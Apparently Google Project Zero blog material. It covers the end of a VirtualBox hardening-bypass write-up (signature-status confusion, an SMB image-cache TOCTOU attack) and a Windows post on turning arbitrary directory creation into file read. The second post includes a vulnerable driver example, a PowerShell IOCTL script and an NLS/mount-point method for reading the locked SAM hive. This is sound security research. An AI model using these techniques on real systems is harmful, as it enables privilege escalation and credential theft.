supHardenedWinVerifyImageByHandle: -> 0 (\..\Tasks\dummy\ABC)
supR3HardenedMonitor_LdrLoadDll: pName=c:\..\tasks\dummy\ABC [calling]
The first two lines indicate the bypass of the Owner check as we expected. The second two indicate it’s verified the ABC file and therefore will call the original LdrLoadDll, which ultimately will append the extension and try to load ABC.DLL instead. But, wait, how come the other checks in NtCreateSection and the loader callback don’t catch loading a completely different file? Let’s search for any instance of ABC.DLL in the rest of the hardening log to find out:
\..\Tasks\dummy\ABC.dll: Owner is not trusted installer
\..\Tasks\dummy\ABC.dll: Relaxing the TrustedInstaller requirement for this DLL (it's in system32).
supHardenedWinVerifyImageByHandle: -> 22900 (\..\Tasks\dummy\ABC.dll)
supR3HardenedWinVerifyCacheInsert: \..\Tasks\dummy\ABC.dll
supR3HardenedDllNotificationCallback:  c:\..\tasks\dummy\ABC.DLL
supR3HardenedScreenImage/LdrLoadDll: cache hit (Unknown Status 22900) on \...\Tasks\dummy\ABC.dll
Again the first two lines indicate we bypassed the Owner check because of our file's location. The next line, supHardenedWinVerifyImageByHandle, is more interesting however. This function verifies the image file. If you look back in this blog at the earlier log of this check you’ll find it returned the result -22900, which was considered an error. In this case, however, it’s returning 22900. As VBOX treats any result >= 0 as success, the hardening code gets confused and assumes that the file is valid. The negative error code is VERR_LDRVI_NOT_SIGNED in the source code, whereas the positive “success” code is VINF_LDRVI_NOT_SIGNED.
This seems to be a bug in the verification code when the calling code holds the DLL Loader Lock, such as in the NtCreateSection hook. The code can’t call WinVerifyTrust in case it tries to load another DLL, which would cause a deadlock. What would normally happen is VINF_LDRVI_NOT_SIGNED is returned from the internal signature checking implementation. That implementation can only handle files with embedded signatures, so if a file isn’t signed it returns that information code to get the verification code to check if the file is catalog signed. What’s supposed to happen is WinVerifyTrust is called and if the file is still not signed it returns the error code. However, as WinVerifyTrust can’t be called due to the lock, the information code gets propagated to the caller, which assumes it’s a success code.
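To make the status-code confusion concrete, here is a minimal sketch of the flow described above. It is a toy model, not VBOX source: only the two status names and their values (22900 and -22900) come from the text, while the function names, the boolean inputs and the "strict" variant are assumptions made for illustration.

```c
#include <stdbool.h>

/* Status values as described in the text. */
#define VINF_SUCCESS            0
#define VINF_LDRVI_NOT_SIGNED   22900     /* informational: no embedded signature */
#define VERR_LDRVI_NOT_SIGNED   (-22900)  /* error: file is not signed at all */

/* Any status >= 0 is treated as success. */
bool status_is_success(int rc) {
    return rc >= VINF_SUCCESS;
}

/* Hypothetical stand-in for the internal embedded-signature checker. */
int check_embedded_signature(bool has_embedded_signature) {
    return has_embedded_signature ? VINF_SUCCESS : VINF_LDRVI_NOT_SIGNED;
}

/* Hypothetical stand-in for the catalog check done via WinVerifyTrust. */
int check_catalog_signature(bool is_catalog_signed) {
    return is_catalog_signed ? VINF_SUCCESS : VERR_LDRVI_NOT_SIGNED;
}

/* Models the problematic flow: under the loader lock the catalog check is
 * skipped, so the informational code is returned to the caller unchanged. */
int verify_image(bool has_embedded_signature, bool is_catalog_signed,
                 bool loader_lock_held) {
    int rc = check_embedded_signature(has_embedded_signature);
    if (rc == VINF_LDRVI_NOT_SIGNED && !loader_lock_held)
        rc = check_catalog_signature(is_catalog_signed);
    return rc;
}

/* One possible hardening (an assumption, not Oracle's actual fix): never let
 * the informational code escape as a final result. */
int verify_image_strict(bool has_embedded_signature, bool is_catalog_signed,
                        bool loader_lock_held) {
    int rc = verify_image(has_embedded_signature, is_catalog_signed,
                          loader_lock_held);
    return rc == VINF_LDRVI_NOT_SIGNED ? VERR_LDRVI_NOT_SIGNED : rc;
}
```

In this model an unsigned file checked while the lock is held yields 22900, which status_is_success accepts, whereas the same file checked outside the lock yields -22900.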
The final question is why the final Loader Callback doesn’t catch the unsigned file? VBOX implements a signed file cache based on the path to avoid checking a file multiple times. When the call to supHardenedWinVerifyImageByHandle was taken to be a success the verifier called supR3HardenedWinVerifyCacheInsert to add a cache entry for this path with the “success” code. We can see that in the Loader Callback it tries to verify the file but gets back a “success” code from the cache so assumes everything's okay, and the loading process is allowed to complete.
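The cache interaction can be sketched in the same spirit. This is a toy model under stated assumptions: the fixed-size table, the function names and the case-insensitive path comparison are all hypothetical (the comparison is suggested only by the log, where ABC.dll and ABC.DLL hit the same entry), and none of it is taken from the VBOX source.

```c
#include <ctype.h>
#include <stdbool.h>
#include <stddef.h>
#include <string.h>

#define CACHE_SLOTS    16
#define CACHE_PATH_LEN 260

struct cache_entry {
    bool used;
    int  rc;                     /* verification status stored for the path */
    char path[CACHE_PATH_LEN];
};

struct verify_cache {
    struct cache_entry slots[CACHE_SLOTS];
};

/* Case-insensitive path comparison (an assumption about the key format). */
static bool path_equal_nocase(const char *a, const char *b) {
    while (*a != '\0' && *b != '\0') {
        if (tolower((unsigned char)*a) != tolower((unsigned char)*b))
            return false;
        a++;
        b++;
    }
    return *a == *b;
}

/* Record a verification result for a path; fails if the table is full
 * or the path does not fit. */
bool cache_insert(struct verify_cache *cache, const char *path, int rc) {
    if (strlen(path) >= CACHE_PATH_LEN)
        return false;
    for (size_t i = 0; i < CACHE_SLOTS; i++) {
        if (!cache->slots[i].used) {
            cache->slots[i].used = true;
            cache->slots[i].rc = rc;
            strcpy(cache->slots[i].path, path);
            return true;
        }
    }
    return false;
}

/* Look up a previously stored result by path. */
bool cache_lookup(const struct verify_cache *cache, const char *path,
                  int *rc_out) {
    for (size_t i = 0; i < CACHE_SLOTS; i++) {
        if (cache->slots[i].used &&
            path_equal_nocase(cache->slots[i].path, path)) {
            *rc_out = cache->slots[i].rc;
            return true;
        }
    }
    return false;
}

/* Models the loader callback: a cache hit with a status >= 0 is trusted
 * without verifying the file again. */
bool cached_result_allows_load(const struct verify_cache *cache,
                               const char *path) {
    int rc;
    return cache_lookup(cache, path, &rc) && rc >= 0;
}
```

Once the informational code 22900 has been inserted for a path, every later lookup for that path reports it as verified, which matches the "cache hit" line in the log.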
Quite a complex set of interactions to get code running. How did Oracle fix this issue? They just add the DLL extension if there’s no extension present. They also handle the case where the filename has a trailing period (which would be removed when loading the DLL).
Exploiting Kernel-Mode Image Loading Behavior
The final bug I’m going to describe was fixed as CVE-2017-10129 in VBOX version 5.1.24. This isn’t really a bug in VBOX as much as it’s an unexpected behavior in Windows.
Through all this it’s worth noting that there’s an implicit race condition in what the hardening code is trying to do, specifically if you could change the file between the verification point and the point where the file is mapped. In theory you could do this to VBOX but the timing window is somewhat short. You could use OPLOCKs and the like but it’s a bit of a pain, instead it’d be nice to get the TOCTOU attack for free.
Let’s look at how image files are handled in the kernel. Mapping an image file on Windows is expensive, the OS doesn’t use position independent code and so can’t just map the DLL into memory as a simple file. Instead the DLL must be relocated to a specific memory address. This requires modifying pages of the DLL file to ensure any pointers are correctly fixed up. This is even more important when you bring ASLR into the mix as ASLR will almost always force a DLL to be relocated from its base address. Therefore, Windows caches an instance of an image mapping whenever it can, this is why the load address of a DLL doesn’t change between processes on the same system, it’s using the same cached image section.
The caching is actually in part under control of the filesystem driver. When a file is opened the IO manager will allocate a new instance of the FILE_OBJECT structure and pass it to the IRP_MJ_CREATE handler for the driver. One of the fields that the driver can then initialize is the SectionObjectPointer. This is an instance of the SECTION_OBJECT_POINTERS structure, which looks like the following:
typedef struct _SECTION_OBJECT_POINTERS {
  PVOID DataSectionObject;
  PVOID SharedCacheMap;
  PVOID ImageSectionObject;
} SECTION_OBJECT_POINTERS;
The fields themselves are managed by the Cache manager, but the structure itself must be allocated by the File System driver. Specifically the allocation should be one per-file in the filesystem; while each open instance of a specific file will have unique FILE_OBJECT instances the SectionObjectPointer should be the same. This allows the Cache manager to fill in the different fields and then reuse them if another instance of the same file tries to be mapped.
The important field here is ImageSectionObject which contains the cached data for the mapped image section. I’m not going to delve into detail of what the ImageSectionObject pointer contains as it’s not really relevant. The important thing is if the SectionObjectPointer and by extension the ImageSectionObject pointers are the same for a FILE_OBJECT instance then mapping that file as an image will map the same cached image mapping. However, as ImageSectionObject pointer is not used when reading from a file it doesn’t follow that what’s actually cached still matches what’s on disk.
Trying to desynchronize the file data from the SectionObjectPointer seems to be pretty tricky with an NTFS volume, at least without administrator privileges. One scenario where you can do this desynchronization is via the SMB redirector when accessing network shares. The reason is pretty simple: it’s the local redirector’s responsibility to allocate the SectionObjectPointer structure when a file is opened on a remote server. As far as the redirector’s concerned, if it opens the file \Share\File.dll on a server twice then it’s the same file. There’s no real other information the redirector can use to verify the identity of the file, it has to guess. Any property you can think of, such as Object ID or Modification Time, can just be a lie. You could easily modify a copy of SAMBA to do this lying for you. The redirector also can’t lock the file and ensure it stays locked. So it seems the redirector just doesn’t bother with any of it; if it looks like the same file from its perspective it assumes it’s fine.
However this is only for the SectionObjectPointer; if the caller wants to read the contents of the file the SMB redirector will go out to the server and try to read the current state of the file. Again this could all be lies, and the server could return any data it likes. This is how we can create a desynchronization: if we map an image file from a SMB server, change the underlying file data, then reopen the file and map the image again, the mapped image will be the cached one, but any data read from the file will be what’s current on the server. This way we can map an untrusted DLL first, then replace the file data with a signed, valid file (SMB supports reading the owner of the file, so we can spoof TrustedInstaller). When VBOX tries to load it, it will verify the signed file but map the cached untrusted image, and it will never know.
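As a purely illustrative model of that desynchronization, the sketch below keeps a cached image per path while reads always fetch the server's current contents. The struct and function names are invented for this example and do not correspond to any Windows or SMB API.

```c
#include <stddef.h>

/* Toy "server": whatever the share currently serves for one path. */
struct toy_server {
    const char *current_contents;
};

/* Toy "redirector" state for the same path: the image section cached the
 * first time the file was mapped as an image. */
struct toy_redirector {
    const char *cached_image;
};

/* Reading file data always goes back to the server. */
const char *toy_read_file(const struct toy_server *server) {
    return server->current_contents;
}

/* Mapping as an image reuses the cached section if one already exists. */
const char *toy_map_image(struct toy_redirector *redirector,
                          const struct toy_server *server) {
    if (redirector->cached_image == NULL)
        redirector->cached_image = server->current_contents;
    return redirector->cached_image;
}
```

If the untrusted contents are mapped first and the server then starts serving a signed file, toy_read_file returns the signed data while toy_map_image still returns the untrusted image, which is the gap the verification falls into.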
Having a remote server isn’t ideal; however, we can do everything we need by using the local loopback SMB server and accessing files via the admin shares. Contrary to their name, admin shares are not limited to administrators if you’re coming from localhost. The key to getting this to work is to use a Directory Junction. Junctions are resolved on the server; the redirector client knows nothing about them. Therefore, if the client opens the file \\localhost\c$\Dir\File.dll once and then reopens it, the client treats both opens as the same file, even though they could be two completely different files, as shown in the following diagram:

Fortunately, one thing which should be evident from the previous two issues is that VBOX’s hardening code doesn’t really care where the DLL is located as long as it meets its two criteria, it’s owned by TrustedInstaller and it’s signed. We can point the COM hijack to a SMB share on the local system. Therefore we can perform the attack as follows:
  1. Set up a junction on the C: drive pointing at a directory containing our untrusted file.
  2. Map the file via the junction over the c$ admin share using LoadLibrary, do not release the mapping until the exploit is complete.
  3. Change the junction to point to another directory with a valid, signed file with the same name as our untrusted file.
  4. Start VBOX with the COM hijack pointing at the file. VBOX will read the file and verify it’s signed and owned by TrustedInstaller, however when it maps it the cached, untrusted image section will be used instead.

So how did Oracle fix this? They now check that the mapped file isn’t on a network share by comparing the path against the prefix \Device\Mup.
Conclusions
The implementation of process hardening in VirtualBox is complex and because of that it is quite error prone. I’m sure there are other ways of bypassing the protection, it just requires people to go looking. Of course none of this would be necessary if they didn’t need to protect access to the VirtualBox kernel driver from malicious use, but that’s a design decision that’s probably going to be difficult to fix in the short term.
Categories: Security

Windows Exploitation Tricks: Arbitrary Directory Creation to Arbitrary File Read

Google Project Zero - Tue, 08/08/2017 - 12:17
Posted by James Forshaw, Project Zero
For the past couple of months I’ve been presenting my “Introduction to Windows Logical Privilege Escalation Workshop” at a few conferences. The restriction of a 2 hour slot fails to do the topic justice and some interesting tips and tricks I would like to present have to be cut out. So as the likelihood of a full training course any time soon is pretty low, I thought I’d put together an irregular series of blog posts which detail small, self contained exploitation tricks which you can put to use if you find similar security vulnerabilities in Windows.
In this post I’m going to give a technique to go from an arbitrary directory creation vulnerability to arbitrary file read. Arbitrary directory creation vulnerabilities do exist - for example, here’s one that was in the Linux subsystem - but it’s not always obvious how you’d exploit such a bug in contrast to arbitrary file creation where a DLL is dropped somewhere. You could abuse DLL Redirection support where you create a directory called program.exe.local to do DLL planting but that’s not always reliable as you’ll only be able to redirect DLLs not in the same directory (such as System32) and only ones which would normally go via Side-by-Side DLL loading.
For this blog we’ll use my example driver from the Workshop which already contains a vulnerable directory creation bug, and we’ll write a PowerShell script to exploit it using my NtObjectManager module. The technique I’m going to describe isn’t a vulnerability, but it’s something you can use if you have a separate directory creation bug.
Quick Background on the Vulnerability Class
When dealing with files from the Win32 API you’ve got two functions, CreateFile and CreateDirectory. It would make sense that there’s a separation between the two operations. However at the Native API level there’s only ZwCreateFile; the way the kernel separates files and directories is by passing either FILE_DIRECTORY_FILE or FILE_NON_DIRECTORY_FILE to the CreateOptions parameter when calling ZwCreateFile. Why the system call is for creating a file and yet the flags are named as if Directories are the main file type I’ve no idea.
A very simple vulnerable example you might see in a kernel driver looks like the following:
NTSTATUS KernelCreateDirectory(PHANDLE Handle,
                               PUNICODE_STRING Path) {
  IO_STATUS_BLOCK io_status = { 0 };
  OBJECT_ATTRIBUTES obj_attr = { 0 };

  // Note: OBJ_FORCE_ACCESS_CHECK is not among the attribute flags.
  InitializeObjectAttributes(&obj_attr, Path,
      OBJ_CASE_INSENSITIVE | OBJ_KERNEL_HANDLE, NULL, NULL);

  return ZwCreateFile(Handle, MAXIMUM_ALLOWED,
                      &obj_attr, &io_status,
                      NULL, FILE_ATTRIBUTE_NORMAL,
                      FILE_SHARE_READ | FILE_SHARE_DELETE,
                      FILE_OPEN_IF, FILE_DIRECTORY_FILE, NULL, 0);
}
There are three important things to note about this code that determine whether it’s an exploitable directory creation vulnerability. Firstly, it’s passing FILE_DIRECTORY_FILE to CreateOptions, which means it’s going to create a directory. Secondly, it’s passing FILE_OPEN_IF as the Disposition parameter. This means the directory will be created if it doesn’t exist, or opened if it does. And thirdly, and perhaps most importantly, the driver is calling a Zw function, which means that the call to create the directory will default to running with kernel permissions, which disables all access checks. The way to guard against this would be to pass the OBJ_FORCE_ACCESS_CHECK attribute flag in the OBJECT_ATTRIBUTES; however, we can see from the flags passed to InitializeObjectAttributes that the flag is not being set in this case.
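Those three conditions can be written down as a small checklist function, which may be handy when auditing driver code by hand. This is a sketch only: the constant values are the ones published in the Windows headers, but the helper itself and its name are hypothetical, and treating FILE_CREATE the same as FILE_OPEN_IF is my own generalization rather than something the driver does.

```c
#include <stdbool.h>
#include <stdint.h>

/* Object attribute flags (values as defined in the Windows headers). */
#define OBJ_CASE_INSENSITIVE   0x00000040u
#define OBJ_KERNEL_HANDLE      0x00000200u
#define OBJ_FORCE_ACCESS_CHECK 0x00000400u

/* Create dispositions and options (values as defined in the Windows headers). */
#define FILE_OPEN              0x00000001u
#define FILE_CREATE            0x00000002u
#define FILE_OPEN_IF           0x00000003u
#define FILE_DIRECTORY_FILE    0x00000001u

/* Hypothetical audit helper: returns true when a Zw* create call from kernel
 * mode matches the pattern described in the text:
 *   1. CreateOptions asks for a directory,
 *   2. the disposition can create the directory,
 *   3. OBJ_FORCE_ACCESS_CHECK is missing from the object attributes. */
bool matches_directory_creation_pattern(uint32_t object_attributes,
                                        uint32_t disposition,
                                        uint32_t create_options) {
    bool wants_directory = (create_options & FILE_DIRECTORY_FILE) != 0;
    bool can_create = disposition == FILE_OPEN_IF ||
                      disposition == FILE_CREATE;
    bool access_checked = (object_attributes & OBJ_FORCE_ACCESS_CHECK) != 0;
    return wants_directory && can_create && !access_checked;
}
```

A call with OBJ_CASE_INSENSITIVE | OBJ_KERNEL_HANDLE, FILE_OPEN_IF and FILE_DIRECTORY_FILE matches the pattern; adding OBJ_FORCE_ACCESS_CHECK to the attributes makes it stop matching.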
Just from this snippet of code we don’t know where the destination path is coming from; it could be from the user or it could be fixed. As long as this code is running in the context of the current process (or is impersonating your user account) it doesn’t really matter. Why is running in the current user’s context so important? It ensures that when the directory is created the owner of that resource is the current user, which means you can modify the Security Descriptor to give you full access to the directory. In many cases even this isn’t necessary as many of the system directories have a CREATOR OWNER access control entry which ensures that the owner gets full access immediately.
Creating an Arbitrary Directory
If you want to follow along you’ll need to set up a Windows 10 VM (doesn’t matter if it’s 32 or 64 bit) and follow the details in setup.txt from the zip file containing my Workshop driver. Then you’ll need to install the NtObjectManager PowerShell Module. It’s available on the PowerShell Gallery, which is an online module repository, so follow the details there.
Assuming that’s all done, let’s get to work. First let’s look at how we can call the vulnerable code in the driver. The driver exposes a Device Object to the user with the name \Device\WorkshopDriver (we can see the setup in the source code). All “vulnerabilities” are then exercised by sending Device IO Control requests to the device object. The code for the IO Control handling is in device_control.c and we’re specifically interested in the dispatch. The code ControlCreateDir is the one we’re looking for; it takes the input data from the user and uses that as an unchecked UNICODE_STRING to pass to the code to create the directory. If we look up the code to create the IOCTL number we find ControlCreateDir is 2, so let’s use the following PS code to create an arbitrary directory.
Import-Module NtObjectManager

# Get an IOCTL for the workshop driver.
function Get-DriverIoCtl {
    Param([int]$ControlCode)
    # Device type "Unknown" is assumed here (FILE_DEVICE_UNKNOWN).
    [NtApiDotNet.NtIoControlCode]::new("Unknown", `
        0x800 -bor $ControlCode, "Buffered", "Any")
}

function New-Directory {
  Param([string]$Filename)
  # Open the device driver.
  Use-NtObject($file = Get-NtFile \Device\WorkshopDriver) {
    # Get IOCTL for ControlCreateDir (2)
    $ioctl = Get-DriverIoCtl -ControlCode 2
    # Convert DOS filename to NT
    $nt_filename = [NtApiDotNet.NtFileUtils]::DosFileNameToNt($Filename)
    $bytes = [Text.Encoding]::Unicode.GetBytes($nt_filename)
    $file.DeviceIoControl($ioctl, $bytes, 0) | Out-Null
  }
}
The New-Directory function first opens the device object, converts the path to a native NT format as an array of bytes and calls the DeviceIoControl function on the device. We could just pass an integer value for control code but the NT API libraries I wrote have an NtIoControlCode type to pack up the values for you. Let’s try it and see if it works to create the directory c:\windows\abc.
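For reference, the integer packing that such a control-code type performs follows the standard CTL_CODE layout from the Windows headers. The sketch below reproduces that layout in plain C; the helper names are invented, and using FILE_DEVICE_UNKNOWN as the device type for the workshop driver is an assumption on my part.

```c
#include <stdint.h>

/* Values as defined in the Windows headers. */
#define FILE_DEVICE_UNKNOWN 0x00000022u
#define METHOD_BUFFERED     0u
#define FILE_ANY_ACCESS     0u

/* Same bit layout as the CTL_CODE macro:
 * device type in bits 16-31, access in bits 14-15,
 * function in bits 2-13, transfer method in bits 0-1. */
uint32_t ctl_code(uint32_t device_type, uint32_t function,
                  uint32_t method, uint32_t access) {
    return (device_type << 16) | (access << 14) | (function << 2) | method;
}

/* Hypothetical helper mirroring the script: function = 0x800 | control code,
 * buffered method, any access. The device type is an assumption. */
uint32_t workshop_ioctl(uint32_t control_code) {
    return ctl_code(FILE_DEVICE_UNKNOWN, 0x800u | control_code,
                    METHOD_BUFFERED, FILE_ANY_ACCESS);
}
```

Under those assumptions, control code 2 packs to 0x222008, which is the raw integer you would pass if you skipped the helper type.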

It works and we’ve successfully created the arbitrary directory. Just to check, we use Get-Acl to get the Security Descriptor of the directory and we can see that the owner is the ‘user’ account, which means we can get full access to the directory.
Now the problem is what to do with this ability? There’s no doubt some system service which might look up in a list of directories for an executable to run or a configuration file to parse. But it’d be nice not to rely on something like that. As the title suggests, we’ll instead convert this into an arbitrary file read. How might we go about doing that?
Mount Point Abuse
If you’ve watched my talk on Abusing Windows Symbolic Links you’ll know how NTFS mount points (or sometimes Junctions) work. The $REPARSE_POINT NTFS attribute is stored with the Directory, and the NTFS driver reads it when opening a directory. The attribute contains an alternative native NT object manager path to the destination of the symbolic link, which is passed back to the IO manager to continue processing. This allows the Mount Point to work between different volumes, but it does have one interesting consequence. Specifically, the path doesn’t actually have to point to another directory. What if we give it a path to a file?
If you use the Win32 APIs it will fail, and if you use the NT APIs directly you’ll find you end up in a weird paradox. If you try to open the mount point as a file the error will say it’s a directory, and if you instead try to open it as a directory it will tell you it’s really a file. It turns out that if you don’t specify either FILE_DIRECTORY_FILE or FILE_NON_DIRECTORY_FILE then the NTFS driver will pass its checks and the mount point can actually redirect to a file.
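The paradox is easier to see as a decision table. The following is a toy model of the observed behaviour, not NTFS code: the flag and status values are the real ones from the Windows headers, but the function is hypothetical and the exact status returned in each failing case is an assumption based on the error descriptions above.

```c
#include <stdint.h>

/* CreateOptions flags (values as defined in the Windows headers). */
#define FILE_DIRECTORY_FILE        0x00000001u
#define FILE_NON_DIRECTORY_FILE    0x00000040u

/* NTSTATUS values (as defined in the Windows headers). */
#define STATUS_SUCCESS             0x00000000u
#define STATUS_FILE_IS_A_DIRECTORY 0xC00000BAu
#define STATUS_NOT_A_DIRECTORY     0xC0000103u

/* Models opening a mount point (a directory) whose reparse target is a file. */
uint32_t toy_open_mount_point_to_file(uint32_t create_options) {
    /* Asked for a file, but the mount point itself is a directory. */
    if (create_options & FILE_NON_DIRECTORY_FILE)
        return STATUS_FILE_IS_A_DIRECTORY;
    /* Asked for a directory, but the redirected target is a file. */
    if (create_options & FILE_DIRECTORY_FILE)
        return STATUS_NOT_A_DIRECTORY;
    /* Neither flag: nothing to contradict, so the redirect goes through. */
    return STATUS_SUCCESS;
}
```

Only the call with neither flag set succeeds in this model, which is the condition we need a system service to satisfy for us.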
Perhaps we can find some system service which will open our file without any of these flags (if you pass FILE_FLAG_BACKUP_SEMANTICS to CreateFile this will also remove all flags) and ideally get the service to read and return the file data?
National Language Support
Windows supports many different languages, and in order to support non-Unicode encodings it still supports Code Pages. A lot is exposed through the National Language Support (NLS) libraries, and you’d assume that the libraries run entirely in user mode, but if you look at the kernel you’ll find a few system calls here and there to support NLS. The one of most interest to this blog is the NtGetNlsSectionPtr system call. This system call maps code page files from the System32 directory into a process’ memory where the libraries can access the code page data. It’s not entirely clear why it needs to be in kernel mode; perhaps it’s just to make the sections shareable between all processes on the same machine. Let’s look at a simplified version of the code, it’s not a very big function:
NTSTATUS NtGetNlsSectionPtr(DWORD NlsType,
                            DWORD CodePage,
                            PVOID *SectionPointer,
                            PULONG SectionSize) {
  UNICODE_STRING section_name;
  OBJECT_ATTRIBUTES section_obj_attr;
  HANDLE section_handle;
  RtlpInitNlsSectionName(NlsType, CodePage, &section_name);
  InitializeObjectAttributes(&section_obj_attr,
                             &section_name,
                             OBJ_KERNEL_HANDLE |
                             OBJ_OPENIF |
                             OBJ_CASE_INSENSITIVE |
                             OBJ_PERMANENT);

  // Open section under \NLS directory.
  if (!NT_SUCCESS(ZwOpenSection(&section_handle,
                         SECTION_MAP_READ,
                         &section_obj_attr))) {
    // If no section then open the corresponding file and create section.
    UNICODE_STRING file_name;
    OBJECT_ATTRIBUTES obj_attr;
    HANDLE file_handle;

    RtlpInitNlsFileName(NlsType,
                        CodePage,
                        &file_name);
    InitializeObjectAttributes(&obj_attr,
                               &file_name,
                               OBJ_KERNEL_HANDLE |
                               OBJ_CASE_INSENSITIVE);
    ZwOpenFile(&file_handle, SYNCHRONIZE,
               &obj_attr, FILE_SHARE_READ, 0);
    ZwCreateSection(&section_handle, FILE_MAP_READ,
                    &section_obj_attr, NULL,
                    PROTECT_READ_ONLY, MEM_COMMIT, file_handle);
    ZwClose(file_handle);
  }

  // Map section into memory and return pointer.
  NTSTATUS status = MmMapViewOfSection(
                      section_handle,
                      SectionPointer,
                      SectionSize);
  ZwClose(section_handle);
  return status;
}
The first thing to note here is it tries to open a named section object under the \NLS directory using a name generated from the CodePage parameter. To get an idea what that name looks like we’ll just list that directory:

The named sections are of the form NlsSectionCP<NUM> where NUM is the number of the code page to map. You’ll also notice there’s a section for a normalization data set. Which file gets mapped depends on the first NlsType parameter, we don’t care about normalization for the moment. If the section object isn’t found the code builds a file path to the code page file, opens it with ZwOpenFile and then calls ZwCreateSection to create a read-only named section object. Finally the section is mapped into memory and returned to the caller.
There are two important things to note here. First, the OBJ_FORCE_ACCESS_CHECK flag is not being set for the open call. This means the call will open any file even if the caller doesn’t have access to it. Second, and most importantly, the final parameter of ZwOpenFile is 0, which means neither FILE_DIRECTORY_FILE nor FILE_NON_DIRECTORY_FILE is being set. Not setting these flags will result in our desired condition: the open call will follow the mount point redirection to a file and not generate an error. What is the file path set to? We can just disassemble RtlpInitNlsFileName to find out:
void RtlpInitNlsFileName(DWORD NlsType,
                         DWORD CodePage,
                         PUNICODE_STRING String) {
  if (NlsType == NLS_CODEPAGE) {
     RtlStringCchPrintfW(String,
              L"\\SystemRoot\\System32\\c_%.3d.nls", CodePage);
  } else {
     // Get normalization path from registry.
     // NOTE about how this is arbitrary registry write to file.
  }
}
The file is of the form c_<NUM>.nls under the System32 directory. Note that it uses the special symbolic link \SystemRoot which points to the Windows directory using a device path format. This prevents this code from being abused by redirecting drive letters and making it an actual vulnerability. Also note that if the normalization path is requested the information is read out from a machine registry key, so if you have an arbitrary registry value writing vulnerability you might be able to exploit this system call to get another arbitrary read, but that’s for the interested reader to investigate.
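To see what names this produces, the format string can be tried out in user mode. The sketch below uses snprintf with the same "%.3d" precision as the disassembled code; the helper names are made up for illustration, and the section-name format (no zero padding, under \NLS) is an assumption based only on the NlsSectionCP<NUM> names listed earlier.

```c
#include <stddef.h>
#include <stdio.h>

/* Builds the code page file path using the same format string as the
 * disassembled routine. "%.3d" pads to at least three digits. */
int nls_codepage_file_name(char *buffer, size_t length, int code_page) {
    return snprintf(buffer, length,
                    "\\SystemRoot\\System32\\c_%.3d.nls", code_page);
}

/* Builds the named section path. The exact format is an assumption. */
int nls_codepage_section_name(char *buffer, size_t length, int code_page) {
    return snprintf(buffer, length, "\\NLS\\NlsSectionCP%d", code_page);
}
```

For code page 1337 the file path comes out as \SystemRoot\System32\c_1337.nls, while a two-digit code page such as 37 is padded to c_037.nls.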
I think it’s clear now what we have to do, create a directory in System32 with the name c_<NUM>.nls, set its reparse data to point to an arbitrary file then use the NLS system call to open and map the file. Choosing a code page number is easy, 1337 is unused. But what file should we read? A common file to read is the SAM registry hive which contains logon information for local users. However access to the SAM file is usually blocked as it’s not sharable and even just opening for read access as an administrator will fail with a sharing violation. There’s of course a number of ways you can get around this, you can use the registry backup functions (but that needs admin rights) or we can pull an old copy of the SAM from a Volume Shadow Copy (which isn’t on by default on Windows 10). So perhaps let’s forget about… no wait we’re in luck.
File sharing on Windows depends on the access being requested. For example, if the caller requests Read access but the file is not shared for read access then the open fails. However, it’s possible to open a file for certain non-content rights, such as reading the security descriptor or synchronizing on the file object, and these rights are not considered when checking the existing file sharing settings. If you look back at the code for NtGetNlsSectionPtr you’ll notice the only access right being requested for the file is SYNCHRONIZE, so the open will always succeed even if the file is locked with no sharing access.
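A simplified model of that sharing rule is sketched below. The access-right and share-mode values are the real ones from the Windows headers, but the function is a hypothetical one-directional check (a new request against an existing opener's share mode) and leaves out the rest of what the real I/O manager does.

```c
#include <stdbool.h>
#include <stdint.h>

/* Access rights (values as defined in the Windows headers). */
#define FILE_READ_DATA   0x00000001u
#define FILE_WRITE_DATA  0x00000002u
#define FILE_APPEND_DATA 0x00000004u
#define FILE_EXECUTE     0x00000020u
#define DELETE           0x00010000u
#define READ_CONTROL     0x00020000u
#define SYNCHRONIZE      0x00100000u

/* Share modes (values as defined in the Windows headers). */
#define FILE_SHARE_READ   0x00000001u
#define FILE_SHARE_WRITE  0x00000002u
#define FILE_SHARE_DELETE 0x00000004u

/* Toy share check: only content-related rights are compared against the
 * share mode of the existing opener. Rights such as SYNCHRONIZE or
 * READ_CONTROL never cause a sharing violation in this model. */
bool toy_share_check(uint32_t desired_access, uint32_t existing_share_mode) {
    bool wants_read   = (desired_access & (FILE_READ_DATA | FILE_EXECUTE)) != 0;
    bool wants_write  = (desired_access & (FILE_WRITE_DATA | FILE_APPEND_DATA)) != 0;
    bool wants_delete = (desired_access & DELETE) != 0;

    if (wants_read && !(existing_share_mode & FILE_SHARE_READ))
        return false;
    if (wants_write && !(existing_share_mode & FILE_SHARE_WRITE))
        return false;
    if (wants_delete && !(existing_share_mode & FILE_SHARE_DELETE))
        return false;
    return true;
}
```

With an existing opener that shares nothing (share mode 0), a FILE_READ_DATA request is refused while a SYNCHRONIZE-only request passes.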
But how can that work? Doesn’t ZwCreateSection need a readable file handle to do the read-only file mapping? Yes and no. Windows file objects do not really care whether a file is readable or writable. Access rights are associated with the handle created when the file is opened. When you call ZwCreateSection from user-mode the call eventually tries to convert the handle to a pointer to the file object. For that to occur the caller must specify what access rights need to be on the handle for it to succeed; for a read-only mapping the kernel requests that the handle has Read Data access. However, just as with access checking for files, if the kernel calls ZwCreateSection then access checking is disabled, including when converting a file handle to the file object pointer. This results in ZwCreateSection succeeding even though the file handle only has SYNCHRONIZE access. This means we can open any file on the system regardless of its sharing mode, and that includes the SAM file.
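The handle-to-object conversion can be modelled in a few lines. This is a sketch of the rule as described above, not kernel code: the two access-right values are real, while the enum and function names are invented for the example.

```c
#include <stdbool.h>
#include <stdint.h>

/* Access rights (values as defined in the Windows headers). */
#define FILE_READ_DATA 0x00000001u
#define SYNCHRONIZE    0x00100000u

/* Who is making the call: kernel code or a user-mode caller. */
enum toy_access_mode { TOY_KERNEL_MODE, TOY_USER_MODE };

/* Toy version of converting a handle to an object pointer: the rights
 * granted to the handle are only compared with the desired rights when the
 * request comes from user mode. */
bool toy_reference_by_handle(uint32_t granted_access, uint32_t desired_access,
                             enum toy_access_mode mode) {
    if (mode == TOY_KERNEL_MODE)
        return true; /* access checking is disabled for kernel callers */
    return (granted_access & desired_access) == desired_access;
}
```

A handle holding only SYNCHRONIZE satisfies a FILE_READ_DATA requirement when the mode is TOY_KERNEL_MODE and fails it when the mode is TOY_USER_MODE.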
